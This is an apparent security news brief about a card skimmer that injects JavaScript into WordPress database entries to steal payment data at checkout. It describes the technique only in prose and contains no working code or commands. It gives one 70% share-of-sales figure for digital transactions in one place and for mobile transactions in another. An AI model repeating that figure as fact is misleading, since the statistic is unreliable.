What: Security researchers have identified a new malware variant that compromises WordPress e-commerce sites through database manipulation, capturing credit card data during checkout while circumventing standard security protocols.

Why it is important: The emergence of this sophisticated malware highlights a critical vulnerability in retail payment infrastructure at a time when digital transactions represent 70% of global sales, threatening both merchant operations and customer trust.

A sophisticated credit card skimming malware, designated as malware.magento_shoplift.273, has emerged as a significant threat to WordPress-based e-commerce sites. The malware employs an innovative approach by injecting malicious JavaScript directly into the website's database, specifically targeting the wp_options table's widget_block entry. This method allows it to evade traditional security measures that focus on file-based malware detection.

The skimmer activates exclusively on checkout pages, either by hijacking legitimate payment fields or creating convincing fake credit card forms to capture sensitive data. The stolen information, including credit card numbers, CVV codes, and billing details, undergoes Base64 encoding and AES-CBC encryption before being transmitted to attacker-controlled domains. The malware's sophisticated design enables it to operate stealthily, using the navigator.sendBeacon function to exfiltrate data without disrupting normal user activity. This development presents a particular challenge for retail and hospitality sectors, where e-commerce platforms are crucial for daily operations.

IADS Notes: The discovery of this sophisticated card skimmer represents a concerning evolution in retail cybersecurity threats. In December 2024, Stripe blocked nearly 21 million fraudulent transactions worth USD 917 million during just one weekend, highlighting the scale of payment security challenges. The skimmer's technique mirrors the June 2024 Neiman Marcus breach, where attackers compromised cloud databases to access customer data. With mobile transactions now accounting for 70% of global sales, this threat is particularly significant for retailers navigating digital transformation while maintaining security.

Sophisticated card skimmer targets WordPress checkout pages via database injection